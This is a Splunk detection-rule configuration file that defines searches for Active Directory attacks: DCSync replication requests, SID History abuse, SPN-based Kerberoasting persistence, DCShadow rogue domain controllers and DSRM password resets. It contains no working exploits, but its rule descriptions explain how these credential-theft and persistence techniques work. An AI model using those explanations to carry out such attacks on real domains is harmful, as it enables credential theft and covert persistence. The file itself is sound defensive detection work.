alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` min(_time) as _time from datamodel=Change where All_Changes.result_id="4794" AND All_Changes.result="An attempt was made to set the Directory Services Restore Mode administrator password" by All_Changes.action, All_Changes.dest, All_Changes.src, All_Changes.user | `drop_dm_object_name(All_Changes)` | `windows_ad_dsrm_password_reset_filter` [ESCU - Windows AD Privileged Account SID History Addition - Rule] action.escu = 0 action.escu.enabled = 1 description = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. Useful for tracking SID history abuse across multiple domains. This detection leverages the Asset and Identities framework. See the implementation section for further details on configuration. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. Useful for tracking SID history abuse across multiple domains. This detection leverages the Asset and Identities framework. See the implementation section for further details on configuration. action.escu.how_to_implement = Ensure you have objectSid and the Down Level Logon Name `DOMAIN\sAMACountName` added to the identity field of your Asset and Identities lookup, along with the category of privileged for the applicable users. Ensure you are ingesting eventcodes 4742 and 4738. Two advanced audit policies `Audit User Account Management` and `Audit Computer Account Management` under `Account Management` are required to generate these event codes. action.escu.known_false_positives = Migration of privileged accounts. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Privileged Account SID History Addition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A Privileged User Account SID History Attribute was added to $userSid$ by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 90}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Privileged Account SID History Addition - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 90, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This detection identifies when the SID of a privileged user is added to the SID History attribute of another user. Useful for tracking SID history abuse across multiple domains. This detection leverages the Asset and Identities framework. See the implementation section for further details on configuration. action.notable.param.rule_title = Windows AD Privileged Account SID History Addition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P.*?)(}$|$)" | eval category="privileged" | lookup identity_lookup_expanded category, identity as SidHistory OUTPUT identity_tag as match | where isnotnull(match) | rename TargetSid as userSid | table _time action status host user userSid SidHistory Logon_ID src_user | `windows_ad_privileged_account_sid_history_addition_filter` [ESCU - Windows AD Privileged Object Access Activity - Rule] action.escu = 0 action.escu.enabled = 1 description = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should be rarely accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should be rarely accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory. action.escu.how_to_implement = Enable Audit Directory Service Access via GPO and collect event code 4662. The required SACLs need to be created for the relevant objects. Be aware Splunk filters this event by default on the Windows TA. action.escu.known_false_positives = Service accounts or applications that routinely query Active Directory for information. action.escu.creation_date = 2023-06-01 action.escu.modification_date = 2023-06-01 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Privileged Object Access Activity - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Discovery"] action.risk = 1 action.risk.param._risk_message = The account $user$ accessed $object_count$ privileged AD object(s). action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}, {"risk_object_field": "object_name", "risk_object_type": "other", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Privileged Object Access Activity - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Discovery"], "cis20": ["CIS 10"], "confidence": 50, "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1087", "T1087.002"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = Windows Active Directory contains numerous objects that grant elevated access to the domain they reside in. These objects should be rarely accessed by normal users or processes. Access attempts to one or more of these objects may be evidence of attacker enumeration of Active Directory. action.notable.param.rule_title = Windows AD Privileged Object Access Activity action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4662 ObjectName IN ( "CN=Account Operators,*", "CN=Administrators,*", "CN=Backup Operators,*", "CN=Cert Publishers,*", "CN=Certificate Service DCOM Access,*", "CN=Domain Admins,*", "CN=Domain Controllers,*", "CN=Enterprise Admins,*", "CN=Enterprise Read-only Domain Controllers,*", "CN=Group Policy Creator Owners,*", "CN=Incoming Forest Trust Builders,*", "CN=Microsoft Exchange Servers,*", "CN=Network Configuration Operators,*", "CN=Power Users,*", "CN=Print Operators,*", "CN=Read-only Domain Controllers,*", "CN=Replicators,*", "CN=Schema Admins,*", "CN=Server Operators,*", "CN=Exchange Trusted Subsystem,*", "CN=Exchange Windows Permission,*", "CN=Organization Management,*") | rex field=ObjectName "CN\=(?[^,]+)" | stats values(Computer) as dest, values(object_name) as object_name, dc(ObjectName) as object_count, min(_time) as firstTime, max(_time) as lastTime, count by SubjectUserName | rename SubjectUserName as user | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `windows_ad_privileged_object_access_activity_filter` [ESCU - Windows AD Replication Request Initiated by User Account - Rule] action.escu = 0 action.escu.enabled = 1 description = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the user account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account creates a handle to domainDNS with the necessary replication permissions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication", "Change"] action.escu.eli5 = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the user account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account creates a handle to domainDNS with the necessary replication permissions. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `4662`. The Advanced Security Audit policy settings `Audit Directory Services Access` within `DS Access` needs to be enabled, as well as the following SACLs applied to the domain root and all descendant objects. The principals `everybody`, `Domain Computers`, and `Domain Controllers` auditing the permissions `Replicating Directory Changes`, `Replicating Directory Changes All`, and `Replicating Directory Changes In Filtered Set` action.escu.known_false_positives = Azure AD Connect syncing operations. action.escu.creation_date = 2024-01-05 action.escu.modification_date = 2024-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Replication Request Initiated by User Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = Windows Active Directory Replication Request Initiated by User Account $user$ at $src_ip$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Replication Request Initiated by User Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This alert was written to detect activity associated with the DCSync attack. When a domain controller receives a replication request, the user account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a user account creates a handle to domainDNS with the necessary replication permissions. action.notable.param.rule_title = Windows AD Replication Request Initiated by User Account action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4662 ObjectType IN ("%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "domainDNS") AND Properties IN ("*Replicating Directory Changes All*", "*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}*", "*{9923a32a-3607-11d2-b9be-0000f87a36b2}*","*{1131f6ac-9c07-11d1-f79f-00c04fc2dcd2}*") AND AccessMask="0x100" AND NOT (SubjectUserSid="NT AUT*" OR SubjectUserSid="S-1-5-18" OR SubjectDomainName="Window Manager" OR SubjectUserName="*$") | stats min(_time) as _time, count by SubjectDomainName, SubjectUserName, Computer, Logon_ID, ObjectName, ObjectServer, ObjectType, OperationType, status | rename SubjectDomainName as Target_Domain, SubjectUserName as user, Logon_ID as TargetLogonId, _time as attack_time | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | table attack_time, AuthenticationPackageName, LogonProcessName, LogonType, TargetUserSid, Target_Domain, user, Computer, TargetLogonId, status, src_ip, src_category, ObjectName, ObjectServer, ObjectType, OperationType | stats min(attack_time) as _time values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(Computer) as Computer, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip by TargetLogonId | `windows_ad_replication_request_initiated_by_user_account_filter` [ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule] action.escu = 0 action.escu.enabled = 1 description = This alert was written to detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} action.escu.data_models = ["Authentication", "Change"] action.escu.eli5 = This alert was written to detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `4662`. The Advanced Security Audit policy settings `Audit Directory Services Access` within `DS Access` needs to be enabled, as well as the following SACLs applied to the domain root and all descendant objects. The principals `everybody`, `Domain Computers`, and `Domain Controllers` auditing the permissions `Replicating Directory Changes`, `Replicating Directory Changes All`, and `Replicating Directory Changes In Filtered Set` Assets and Identities will also need to be configured, with the category of domain_controller added for domain controllers. action.escu.known_false_positives = Genuine DC promotion may trigger this alert. action.escu.creation_date = 2024-01-05 action.escu.modification_date = 2024-01-05 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"] action.risk = 1 action.risk.param._risk_message = Windows Active Directory Replication Request Initiated from Unsanctioned Location $src_ip$ by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Replication Request Initiated from Unsanctioned Location - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Credential Dumping"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1003.006", "T1003"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This alert was written to detect activity associated with the DCSync attack performed by computer accounts. When a domain controller receives a replication request, the account permissions are validated, however no checks are performed to validate the request was initiated by a Domain Controller. Once an attacker gains control of an account with the necessary privileges, they can request password hashes for any or all users within the domain. This alert detects when a computer account account creates a handle to domainDNS with the necessary replication permissions. These requests are then filtered to exclude where the events originate from a known domain controller IP address. action.notable.param.rule_title = Windows AD Replication Request Initiated from Unsanctioned Location action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4662 ObjectType IN ("%{19195a5b-6da0-11d0-afd3-00c04fd930c9}", "domainDNS") AND Properties IN ("*Replicating Directory Changes All*", "*{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}*", "*{9923a32a-3607-11d2-b9be-0000f87a36b2}*","*{1131f6ac-9c07-11d1-f79f-00c04fc2dcd2}*") AND AccessMask="0x100" AND (SubjectUserSid="NT AUT*" OR SubjectUserSid="S-1-5-18" OR SubjectDomainName="Window Manager" OR SubjectUserName="*$") | stats min(_time) as attack_time, count by SubjectDomainName, SubjectUserName, Computer, Logon_ID, ObjectName, ObjectServer, ObjectType, OperationType, status | rename SubjectDomainName as Target_Domain, SubjectUserName as user, Logon_ID as TargetLogonId | appendpipe [| map search="search `wineventlog_security` EventCode=4624 TargetLogonId=$TargetLogonId$"] | table attack_time, AuthenticationPackageName, LogonProcessName, LogonType, TargetUserSid, Target_Domain, user, Computer, TargetLogonId, status, src_ip, src_category, ObjectName, ObjectServer, ObjectType, OperationType | stats min(attack_time) as _time, values(TargetUserSid) as TargetUserSid, values(Target_Domain) as Target_Domain, values(user) as user, values(Computer) as Computer, values(status) as status, values(src_category) as src_category, values(src_ip) as src_ip by TargetLogonId | search NOT src_category="domain_controller" | `windows_ad_replication_request_initiated_from_unsanctioned_location_filter` [ESCU - Windows AD Same Domain SID History Addition - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcodes `4738` and `4742`. The Advanced Security Audit policy settings `Audit User Account Management` and `Audit Computer Account Management` within `Account Management` all need to be enabled. SID resolution is not required.. action.escu.known_false_positives = Unknown action.escu.creation_date = 2022-09-09 action.escu.modification_date = 2022-09-09 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Same Domain SID History Addition - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks", "Windows Persistence Techniques"] action.risk = 1 action.risk.param._risk_message = Active Directory SID History Attribute was added to $user$ by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 100}, {"risk_object_field": "user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Same Domain SID History Addition - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks", "Windows Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1134.005", "T1134"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic looks for changes to the sIDHistory AD attribute of user or computer objects which exist within the same domain. The SID history AD attribute allows users to inherit permissions from a separate AD account without group changes. Initially developed for access continuity when migrating user accounts to different domains, this attribute can also be abused by adversaries to stealthily grant access to a backdoor account within the same domain. This analytic was written to pick up on activity via Mimikatz sid::patch. Please note there are additional avenues to abuse SID history such as DCShadow & Golden / Diamond tickets which won't be detected using these event codes. action.notable.param.rule_title = Windows AD Same Domain SID History Addition action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` (EventCode=4742 OR EventCode=4738) NOT SidHistory IN ("%%1793", -) | rex field=SidHistory "(^%{|^)(?P.*)(\-|\\\)" | rex field=TargetSid "^(?P.*)(\-|\\\)" | where SidHistoryMatch=TargetSidmatch OR SidHistoryMatch=TargetDomainName | rename TargetSid as userSid, TargetDomainName as userDomainName | table _time action status host user userSid userDomainName SidHistory Logon_ID src_user | `windows_ad_same_domain_sid_history_addition_filter` [ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for AD objects in order to ingest attribute modifications. action.escu.known_false_positives = A Service Principal Name should only be added to an account when an application requires it. While infrequent, this detection may trigger on legitimate actions. Filter as needed. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A Servince Principal Name for $ObjectDN$ was set by $user$ action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "other", "risk_score": 30}, {"risk_object_field": "ObjectDN", "risk_object_type": "user", "risk_score": 30}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD ServicePrincipalName Added To Domain Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 60, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a Service Principal Name to a domain account. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Servce Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. action.notable.param.rule_title = Windows AD ServicePrincipalName Added To Domain Account action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName OperationType="%%14674" | stats values(ObjectDN) as ObjectDN by _time, Computer, SubjectUserName, AttributeValue | rename Computer as dest SubjectUserName as user | `windows_ad_serviceprincipalname_added_to_domain_account_filter` [ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. action.escu.how_to_implement = To successfully implement this search, you ned to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled. Additionally, a SACL needs to be created for AD objects in order to ingest attribute modifications. action.escu.known_false_positives = A Service Principal Name should only be added to an account when an application requires it. Adding an SPN and quickly deleting it is less common but may be part of legitimate action. Filter as needed. action.escu.creation_date = 2022-11-18 action.escu.modification_date = 2022-11-18 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = A Servince Principal Name for $user$ was set and shortly deleted action.risk.param._risk = [{"risk_object_field": "user", "risk_object_type": "user", "risk_score": 40}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Domain Account ServicePrincipalName - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the addition of a Service Principal Name to a domain account that is quickly deleted within 5 minutes or less. While this event may be part of a legitimate action part of certain administrative operations, it may also be evidence of a persistence attack. Domain accounts with Service Principal Names are vulnerable to a technique called Kerberoasting that enables attackers to potentially obtain the cleartext password of the account by performing offline cracking. An adversary who has obtained privileged access to a domain environment may add an SPN to a privileged account to then leverage the Kerberoasting technique and attempt to obtain its clertext password. To clean things up, the adversary may delete the SPN which will trigger this detection. action.notable.param.rule_title = Windows AD Short Lived Domain Account ServicePrincipalName action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=5136 AttributeLDAPDisplayName=servicePrincipalName | transaction ObjectDN AttributeValue startswith=(EventCode=5136 OperationType="%%14674") endswith=(EventCode=5136 OperationType="%%14675") | eval short_lived=case((duration<300),"TRUE") | search short_lived = TRUE | rename ObjectDN as user | `windows_ad_short_lived_domain_account_serviceprincipalname_filter` [ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies when either a global catalog SPN or a DRS RPC SPN are temporarily added to an Active Directory computer object, both of which can be evidence of a DCShadow attack. DCShadow allows an attacker who has obtained privileged access to register a rogue Domain Controller (DC). Once registered, the rogue DC may be able to inject and replicate changes into the AD infrastructure for any domain object, including credentials and keys. This technique was initially released in 2018 by security researchers Benjamin Delpy and Vincent Le Toux. No event logs are written for changes to AD attributes, allowing for stealthy backdoors to be implanted in the domain, or metadata such as timestamps overwritten to cover tracks. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting eventcode `5136`. The Advanced Security Audit policy setting `Audit Directory Services Changes` within `DS Access` needs to be enabled, alongside a SACL for `everybody` to `Write All Properties` applied to the domain root and all descendant objects. action.escu.known_false_positives = None. action.escu.creation_date = 2023-11-07 action.escu.modification_date = 2023-11-07 action.escu.confidence = high action.escu.full_search_name = ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Sneaky Active Directory Persistence Tricks"] action.risk = 1 action.risk.param._risk_message = Short Lived Domain Controller SPN AD Attribute Triggered by $src_user$ action.risk.param._risk = [{"risk_object_field": "src_user", "risk_object_type": "user", "risk_score": 100}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Windows AD Short Lived Domain Controller SPN Attribute - Rule action.correlationsearch.annotations = {"analytic_story": ["Sneaky Active Directory Persistence Tricks"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1207"], "nist": ["DE.CM"]} 